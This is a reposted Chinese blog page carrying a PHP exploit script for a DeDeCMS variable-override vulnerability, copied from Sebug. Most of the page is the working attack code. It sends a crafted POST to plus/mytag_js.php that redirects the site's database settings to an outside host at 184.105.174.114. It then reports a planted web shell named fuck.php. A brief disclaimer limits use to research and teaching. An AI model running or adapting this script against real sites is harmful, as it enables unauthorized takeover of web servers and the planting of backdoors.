zoukankan      html  css  js  c++  java

  • DeDeCMS(织梦)变量覆盖0day getshell

    测试方法:

    @Sebug.net   dis
    本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
      1. #!usr/bin/php -w
      2. <?php
      3. error_reporting(E_ERROR);
      4. set_time_limit(0);
      5. print_r('
      6. DEDEcms Variable Coverage
      7. Exploit Author: [url]www.heixiaozi.com[/url] [url]www.webvul.com[/url]
      8. );
      9. echo " ";
      10. if($argv[2]==null){
      11. print_r('
      12. +---------------------------------------------------------------------------+
      13. Usage: php '.$argv[0].' url aid path
      14. aid=1 shellpath /data/cache aid=2 shellpath=/ aid=3 shellpath=/plus/
      15. Example:
      16. php '.$argv[0].'[url]www.site.com[/url] 1 old
      17. +---------------------------------------------------------------------------+
      18. ');
      19. exit;
      20. }
      21. $url=$argv[1];
      22. $aid=$argv[2];
      23. $path=$argv[3];
      24. $exp=Getshell($url,$aid,$path);
      25. if (strpos($exp,"OK")>12){
      26. echo "[*] Exploit Success ";
      27. if($aid==1)echo "[*] Shell:".$url."/$path/data/cache/fuck.php " ;
      28.  
      29. if($aid==2)echo "[*]Shell:".$url."/$path/fuck.php " ;
      30.  
      31. if($aid==3)echo "[*]Shell:".$url."/$path/plus/fuck.php ";
      32.  
      33. }else{
      34. echo "[*]ExploitFailed ";
      35. }
      36. function Getshell($url,$aid,$path){
      37. $id=$aid;
      38. $host=$url;
      39. $port="80";
      40. $content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
      41. $data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1 ";
      42. $data .= "Host:".$host." ";
      43. $data .= "User-Agent:Mozilla/5.0(Windows NT 5.2; rv:5.0.1)Gecko/20100101Firefox/5.0.1 ";
      44. $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 ";
      45. $data .= "Accept-Language: zh-cn,zh;q=0.5 ";
      46. //$data .= "Accept-Encoding: gzip,deflate ";
      47. $data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7 ";
      48. $data .= "Connection: keep-alive ";
      49. $data .= "Content-Type: application/x-www-form-urlencoded ";
      50. $data .= "Content-Length: ".strlen($content)." ";
      51. $data .= $content." ";
      52. $ock=fsockopen($host,$port);
      53. if (!$ock) {
      54. echo "[*] No response from ".$host." ";
      55. }
      56. fwrite($ock,$data);
      57. while (!feof($ock)) {
      58. $exp=fgets($ock, 1024);
      59. return $exp;
      60. }
      61. }
      62.  
      63. ?>
      64. 摘自:http://sebug.net/vuldb/ssvid-20949
  • 相关阅读:
    数据库 MySQL part4
    数据库 MySQL part3
    win64 Python下安装PIL出错解决2.7版本 (3.6版本可以使用)
    Python3.6 安装、后续终端pip 安装模块命令
    Python for循环文件
    Python遍历字典dict的几种方法
    Python 模块xml
    Socket 是嘛玩意儿(简单聊聊)
    Python高阶函数(Map、Reduce、Filter)和lambda函数一起使用 ,三剑客
    异步加载数据
  • 原文地址:https://www.cnblogs.com/milantgh/p/3615939.html
Copyright © 2011-2022 走看看